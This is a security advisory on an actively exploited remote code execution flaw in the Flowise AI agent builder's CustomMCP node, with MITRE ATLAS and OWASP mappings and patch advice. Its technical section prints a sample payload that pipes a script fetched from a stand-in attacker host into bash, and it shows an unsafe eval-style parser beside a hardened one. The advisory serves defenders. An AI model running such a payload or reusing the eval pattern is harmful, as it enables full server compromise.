
Flowise AI Agent Builder Under Active CVSS 10.0 RCE Exploitation; 12,000+ Instances Exposed

A maximum-severity (CVSS 10.0) remote code execution vulnerability in Flowise, a widely used open-source AI agent builder, is under active exploitation, with over 12,000 internet-exposed instances at risk. The flaw, CVE-2025-59528, exists in the CustomMCP node and allows unauthenticated JavaScript execution with full Node.js runtime privileges via unsanitised MCP server configuration input. This marks the third Flowise vulnerability exploited in the wild, underscoring systemic security gaps in AI orchestration and agent-building platforms.


Overview

A critical remote code execution (RCE) vulnerability in Flowise — a popular open-source platform for building AI agents and LLM workflows — is being actively exploited in the wild. CVE-2025-59528 carries a maximum CVSS score of 10.0 and affects the platform’s CustomMCP node, which handles configuration for Model Context Protocol (MCP) server connections. With more than 12,000 internet-facing Flowise instances exposed, the attack surface is substantial. This is the third Flowise vulnerability to be exploited in the wild, following CVE-2025-8943 (CVSS 9.8) and CVE-2025-26319 (CVSS 8.9).

Technical Analysis

The vulnerability resides in the CustomMCP node’s handling of the mcpServerConfig input string. Flowise parses this user-supplied configuration to build the MCP server connection parameters. Critically, during this parsing process, the platform executes embedded JavaScript code without any security validation or sandboxing.

Because Flowise operates with full Node.js runtime privileges, a malicious actor can inject arbitrary JavaScript referencing dangerous built-in modules:

// Example of malicious mcpServerConfig payload
{
  "command": "node",
  "args": ["-e", "require('child_process').exec('curl http://attacker.com/shell.sh | bash')"]
}

This grants attackers access to child_process (arbitrary OS command execution) and fs (full file system read/write). Exploitation requires only a valid API token, lowering the barrier considerably. VulnCheck has attributed current exploitation activity to a single Starlink IP address, suggesting opportunistic scanning and exploitation at scale.
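To make the parsing flaw concrete, the following is an added example (not Flowise's code and not the vendor's fix) that contrasts an eval-style parser for the mcpServerConfig string with a strict parser that treats the string as data only; the command allowlist, the flag list and the function names are assumptions.

```javascript
// Added example, not Flowise's own code: an eval-style config parser (the class
// of flaw described above) beside a strict, data-only parser. Allowlist is assumed.

const INLINE_EVAL_FLAGS = new Set(['-e', '--eval', '-p', '--print']);
const ALLOWED_COMMANDS = new Set(['npx', 'uvx']); // assumption: deployment-specific allowlist

// UNSAFE pattern: evaluating the config as a JavaScript expression runs any
// expression in the string at parse time, with the server's full privileges.
function parseConfigUnsafe(input) {
  return new Function(`return (${input});`)();
}

// Constructed, harmless input: sets a global marker as a side effect of parsing.
const CONSTRUCTED_EVAL_INPUT = '{ command: (globalThis.__parsedByEval = true, "npx") }';

function unsafeParserRunsCode() {
  delete globalThis.__parsedByEval;
  parseConfigUnsafe(CONSTRUCTED_EVAL_INPUT);
  return globalThis.__parsedByEval === true; // true: code ran before any validation
}

// SAFE pattern: strict JSON, shape check, command allowlist, no inline-eval flags.
function parseConfigStrict(input) {
  let cfg;
  try {
    cfg = JSON.parse(input); // data only; never evaluates code
  } catch {
    throw new Error('mcpServerConfig must be valid JSON');
  }
  if (cfg === null || typeof cfg !== 'object' || Array.isArray(cfg)) {
    throw new Error('mcpServerConfig must be a JSON object');
  }
  const { command, args = [], env = {} } = cfg;
  if (typeof command !== 'string' || !ALLOWED_COMMANDS.has(command)) {
    throw new Error(`command not in allowlist: ${String(command)}`);
  }
  if (!Array.isArray(args) || !args.every((a) => typeof a === 'string')) {
    throw new Error('args must be an array of strings');
  }
  const evalFlag = args.find((a) => INLINE_EVAL_FLAGS.has(a) || /^--(eval|print)=/.test(a));
  if (evalFlag !== undefined) {
    throw new Error(`inline code execution flag rejected: ${evalFlag}`);
  }
  if (env === null || typeof env !== 'object' || Array.isArray(env) ||
      !Object.values(env).every((v) => typeof v === 'string')) {
    throw new Error('env must be an object of string values');
  }
  return { command, args, env }; // safe to hand to spawn(command, args, { env, shell: false })
}
```

The strict parser rejects the page's payload twice over: "node" is not on the allowlist, and "-e" is an inline-eval flag.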

Framework Mapping

MITRE ATLAS:

  • AML.T0047 – ML-Enabled Product or Service: Flowise is a production AI orchestration platform; compromise affects downstream AI pipelines and agent behaviour.
  • AML.T0040 – ML Model Inference API Access: Attacker gains server-level access through the AI platform’s API surface.
  • AML.T0010 – ML Supply Chain Compromise: Unpatched Flowise instances embedded in enterprise AI stacks represent a supply chain risk vector.

OWASP LLM Top 10:

  • LLM07 – Insecure Plugin Design: The CustomMCP node acts as a plugin/tool with no input sanitisation or code execution controls.
  • LLM08 – Excessive Agency: The platform executes code with full system privileges, far exceeding necessary operational scope.
  • LLM05 – Supply Chain Vulnerabilities: Third-party AI infrastructure components with unpatched critical flaws introduce systemic risk.
  • LLM06 – Sensitive Information Disclosure: Successful exploitation enables exfiltration of credentials, model configurations, and customer data.

Impact Assessment

The 12,000+ exposed instances represent a broad attack surface spanning enterprises, startups, and research institutions using Flowise for production AI agent workflows. A successful exploit yields full server compromise, enabling lateral movement, data exfiltration, ransomware deployment, or persistent backdoor installation. The vulnerability has been public for over six months since the September 2025 advisory, meaning any unpatched instance has had prolonged exposure. Large corporations using Flowise as part of their AI infrastructure face significant business continuity and data protection risks.

Mitigation & Recommendations

  1. Patch immediately: Upgrade to Flowise npm package version 3.0.6 or later, which addresses CVE-2025-59528.
  2. Restrict internet exposure: Remove Flowise instances from public internet access; place behind VPN or zero-trust network access controls.
  3. Audit API token usage: Rotate all API tokens and review access logs for anomalous activity originating from unknown IP addresses.
  4. Monitor for indicators: Watch for unexpected outbound connections, unusual child_process activity, or file system modifications on Flowise host systems.
  5. Inventory AI infrastructure: Conduct a full audit of AI orchestration tools (Flowise, LangChain, etc.) across the stack to identify additional exposure.
  6. Apply defence-in-depth: Sandbox or containerise AI agent platforms with least-privilege OS configurations to limit blast radius from future exploits.
